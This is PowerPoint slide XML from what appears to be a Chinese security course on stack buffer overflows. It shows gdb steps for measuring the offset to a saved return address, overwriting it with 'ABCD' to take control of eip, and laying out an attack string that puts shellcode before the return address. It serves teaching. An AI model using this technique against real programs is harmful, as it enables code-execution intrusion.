              <a:rPr lang="en-US" sz="24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lang="en-US" sz="2400" b="1" dirty="0" smtClean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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0" smtClean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0xbffff38c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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:	0x0804840b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584200" marR="5080" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="13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函数入口处的堆栈指针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esp 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指向的栈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地址为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0xbffff38c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）保存了函数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foo()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返回到调用函数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(main)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的地址（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0x0804840b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），即“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函数的返回地址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613187" y="1217295"/>
            <a:ext cx="10845388" cy="435106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84200" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="12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为了核实该结论，可以查看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main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的汇编代码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在地址为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0x0804840b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指令的前一条指令为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call  0x80483e4 &lt;foo&gt;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 而地址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0x80483e4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为函数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foo()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的第一条指令的地址，因此，函数入口处的堆栈保存的是被调用函数的返回地址。 也可以用下面的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gdb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命令证实这一点。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="625"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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gdb) 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x/2i 0x0804840b-5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612265" marR="1214120" lvl="2">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3670300" algn="l"/>
                <a:tab pos="4354830" algn="l"/>
                <a:tab pos="451612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0x8048406 &lt;main+6&gt;:	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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0" smtClean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call</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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0x80483e4 &lt;foo&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="006F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612265" marR="1214120" lvl="2">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3670300" algn="l"/>
                <a:tab pos="4354830" algn="l"/>
                <a:tab pos="4516120" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" smtClean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0x804840b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&lt;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main+11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&gt;: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mov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0x0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%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eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="584200" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="173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记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录 堆 栈 指 针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esp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 值 ， 在 此 以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标 记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41300" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1730"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2413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 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=$esp=0xbffff38c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403" y="1407629"/>
            <a:ext cx="10537422" cy="363214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84200" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000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继续执行到下一个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断点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698500" lvl="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="415"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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gdb)</a:t>
            </a:r>
            <a:r>
              <a:rPr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c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" marR="2967990" lvl="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef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Breakpoint 2, 0x080483f9 in foo ()  1: x/i $pc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="4336415" algn="l"/>
              </a:tabLst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=&gt; 0x80483f9 &lt;foo+21&gt;: call	0x8048300 &lt;strcpy@plt&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="584200" marR="5080" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="13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查看执行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strcpy(des, src)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之前堆栈的内容。由于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语言默认将参数逆序推入堆栈，因此，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src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全局变量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Lbuffer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的地址）先进栈（高地址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），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des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foo()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中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buff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的首地址）后进栈（低地址）。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1105259" y="1188312"/>
            <a:ext cx="9963510" cy="470551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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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x/x      </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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$</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" err="1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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="-5" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000CC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5080">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0xbffff360:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 0xbffff370</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="24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41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(gdb) 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spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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 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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0xbffff364:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400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0x0804a040</a:t>
            </a:r>
            <a:endParaRPr sz="2400" spc="-15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241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(gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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x/s 0x0804a040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ts val="3195"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="17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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0x804a040</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400"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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Lbuffer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&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"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01234567890123456789========ABCD“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1300" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="3195"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
                <a:tab pos="2625090" algn="l"/>
                <a:tab pos="551053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可见，Lbuffer的地址0x804a040保存在地址为0xbffff364的栈中，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buff的首地址0xbffff370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保存在地址0xbffff360的栈中。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 indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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 indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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39201" y="1012825"/>
            <a:ext cx="10490799" cy="542969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84200" marR="24765" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="125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令</a:t>
            </a:r>
            <a:r>
              <a:rPr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=</a:t>
            </a:r>
            <a:r>
              <a:rPr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buff</a:t>
            </a:r>
            <a:r>
              <a:rPr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的首地址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=0xbffff370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，则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buff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的首地址与返回地址所在栈的距离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=A-B=0xbffff38c -  0xbffff370=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0x1c=28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</a:p>
          <a:p>
            <a:pPr marL="584200" marR="5080" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="103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因此，如果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Lbuffer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的内容超过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28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字节，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则将发生缓冲区溢出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，并且返回地址被改写。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Lbuffer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的长度为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32 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字节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，其中最后的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4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个字节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为 “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ABCD”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因此，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执行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strcpy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(des, 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src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之后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返回地址由原来的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0x0804840b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变为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“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ABCD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”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0x44434241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），即返回地址被改写。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="584200" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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继续执行到下一个断点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef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(gdb) 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marR="2337435" lvl="2">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165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Breakpoint 3, 0x080483ff in foo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()</a:t>
            </a:r>
            <a:endParaRPr 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marR="2337435" lvl="2">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
            </a:pP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1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: x/i $pc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1384300" lvl="2">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="458470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=&gt; 0x80483ff &lt;foo+27&gt;:	ret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006" y="346016"/>
            <a:ext cx="4444016" cy="378554"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" spc="5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350008" y="336652"/>
            <a:ext cx="9841992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36652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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="1738593"/>
            <a:ext cx="4430395" cy="707887"/>
            <a:chOff x="1598315" y="1418185"/>
            <a:chExt cx="4430396" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12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gradFill>
                    <a:gsLst>
                      <a:gs pos="100000">
                        <a:srgbClr val="245689"/>
                      </a:gs>
                      <a:gs pos="0">
                        <a:srgbClr val="4C8ED0"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gra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2066310" y="1418185"/>
              <a:ext cx="3962401" cy="506729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/>
              <a:r>
                <a:rPr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缓冲区溢出概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="2771117"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17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Linux IA32 的进程映像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13" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="3794116"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15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03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335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缓冲区溢出的原理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1307460" y="4839340"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720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04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335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缓冲区溢出攻击技术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0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613187" y="1226007"/>
            <a:ext cx="10756428" cy="353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342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="13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即将执行的指令为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ret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。执行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ret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时把堆栈的内容（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4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个字节）弹出到指令寄存器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eip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esp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的值增加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4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，然后跳转到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eip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所保存的地址去继续执行（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ret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指令让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eip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等于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esp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指向的内容，并且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esp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等于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esp+4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）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1155700" lvl="2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="241300" algn="l"/>
              </a:tabLst>
            </a:pP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(gdb) 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x/s $esp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lvl="2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2844165" algn="l"/>
              </a:tabLst>
            </a:pP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0xbffff38c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:	"ABCD"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="584200" marR="24130" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="13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可见，执行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ret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之前的堆栈的内容为”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ABCD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”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即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0x44434241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。可以推断执行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ret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后将跳到地址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0x44434241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去执行。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4" name="矩形 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1847850" y="247949"/>
              <a:ext cx="1034415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27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="758227" y="254696"/>
            <a:ext cx="944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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" spc="6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758227" y="1181100"/>
            <a:ext cx="10639388" cy="46031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继续单步执行下一条指令：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469900" lvl="1">
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2413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gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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si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2">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
                <a:tab pos="6985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0x44434241 in ??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1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: x/i $pc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2">
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
                <a:tab pos="698500" algn="l"/>
              </a:tabLst>
            </a:pP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=&gt;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0x44434241:  &lt;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error:Cannot access memory at </a:t>
            </a:r>
            <a:r>
              <a:rPr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address  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0x44434241&gt; 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413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	  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gdb) </a:t>
            </a:r>
            <a:r>
              <a:rPr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x $eip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413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	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0x44434241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:	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Cannot access memory at address 0x44434241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355600" marR="304800" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105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可见程序指针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eip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的值为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0x44434241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，而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0x44434241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是不可访问的地址，因此发生段错误。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355600" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2735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eip=0x44434241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，正好是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”ABCD”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倒过来，这是由于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IA32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默认字节序为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little_endian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（低字节存放在低地址）。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355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="103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通过修改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Lbuffer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的内容（将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”ABCD”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改成期望的地址</a:t>
            </a:r>
            <a:r>
              <a:rPr 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），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就可以设置需要的返回地址，从而可以将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eip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变为可以控 制的地址，也就是说可以控制程序的执行流程。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2675255" y="247949"/>
              <a:ext cx="9516745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5190" y="336550"/>
            <a:ext cx="1941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lang="zh-CN" altLang="en-US" sz="2400" spc="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调试重点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467" y="1425219"/>
            <a:ext cx="10256808" cy="3680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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>在3个关键之处设置断点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>第一条汇编语句：在此记下函数的返回地址（A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp本身的值</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>） (会动态变化)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>调用strcpy对应的汇编语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>记下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>smallbuf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>的起始地址</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=$esp指向的内存的值</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>=B (</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>会动态变化</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>)，与A相减可以得到产生缓冲区溢出所 需的字节数（偏移）=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A-B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>ret语句：查看esp指向的内容，确定被修改后的返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr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006" y="346016"/>
            <a:ext cx="4444016" cy="378554"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" spc="5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350008" y="336652"/>
            <a:ext cx="9841992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336652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5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="1738593"/>
            <a:ext cx="4430395" cy="707887"/>
            <a:chOff x="1598315" y="1418185"/>
            <a:chExt cx="4430396" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12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2066310" y="1418185"/>
              <a:ext cx="3962401" cy="506729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/>
              <a:r>
                <a:rPr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缓冲区溢出概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="2771117"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17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Linux IA32 的进程映像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13" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1307460" y="3794116"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720" cy="707886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15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solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="85000"/>
                    </a:schemeClr>
                  </a:soli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03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335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缓冲区溢出的原理</a:t>
              </a:r>
              <a:endParaRPr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1307460" y="4839340"/>
            <a:ext cx="5186679" cy="707887"/>
            <a:chOff x="1598315" y="2786337"/>
            <a:chExt cx="4355720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5335" dirty="0" smtClean="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="100000">
                        <a:srgbClr val="245689"/>
                      </a:gs>
                      <a:gs pos="0">
                        <a:srgbClr val="4C8ED0"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="0" scaled="1"/>
                  </a:gradFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="思源黑体 CN Normal" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5335" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="100000">
                      <a:srgbClr val="245689"/>
                    </a:gs>
                    <a:gs pos="0">
                      <a:srgbClr val="4C8ED0"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="0" scaled="1"/>
                </a:gradFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                <a:ea typeface="思源黑体 CN Normal" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Century Gothic" panose="020B0502020202020204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1991332" y="2808562"/>
              <a:ext cx="3962703" cy="45275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ea"/>
                </a:rPr>
                <a:t>缓冲区溢出攻击技术</a:t>
              </a:r>
              <a:endPara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0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650" y="1301750"/>
            <a:ext cx="10442575" cy="44856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4200" marR="15240" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="1300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为了实现缓冲区溢出攻击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，需要向被攻击的缓冲区写入合适的内容。为此，攻击者必须精心构造攻击串，并根据被攻击缓冲区的大小</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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将</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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放置在的适当位置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。在此以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strcpy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为例，说明攻击串的构造方法。考虑如下函数：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1384300" lvl="2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="24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void foo() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1840865" lvl="2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25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char buffer[LEN];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1840865" lvl="2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
            </a:pP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strcpy (buffer, attackStr);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lvl="2">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="26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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="584200" marR="5080" indent="-342900" algn="just" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="13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显然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，若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attackStr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的内容过多，则上述代码会发生缓冲区溢出错误。在此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buffer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是被攻击的字符串，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attackStr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是攻击串。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="584200" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="71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假定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attackStr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是攻击者可以设置的，则有两种常用的方法构造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attackStr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82650" y="1143000"/>
            <a:ext cx="10461625" cy="5528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/>
              <a:t>方法一：将Shellcode放置在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跳转地址</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(函数返回地址所在的栈)之前</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>如果被攻击的缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(buffer) </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>较大</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>，足以容纳</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Shellcode，则可以采用这种方法。attackStr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>的内容按图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1(a) </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>的方式组织</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>其中，offset为被攻缓冲区(buffer)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>首地址与函数的返回地址所在栈地址的距离</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>，需要通过gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>调试确定。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>对于老版本的Linux系统，跳转地址RETURN的值可通过gdb调试目标进程而确定。然而，现代的操作系统由于在内核使用了地址随机化技术，堆栈的起始地址是动态变化的，进程每次启动时均与上一次不同，只能猜测 一个可能的地址。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1355" y="1315085"/>
            <a:ext cx="3209925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图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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1(a)</a:t>
            </a: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攻击串的构造</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 7" descr="图片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5" y="2437130"/>
            <a:ext cx="7875905" cy="304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032125" y="1302886"/>
            <a:ext cx="673227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3650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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图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1(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即将执行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strcpy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之前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buffer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及栈的内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 8" descr="图片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25" y="2296160"/>
            <a:ext cx="7316470" cy="2818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1860" y="1205545"/>
            <a:ext cx="752348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algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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图</a:t>
            </a:r>
            <a:r>
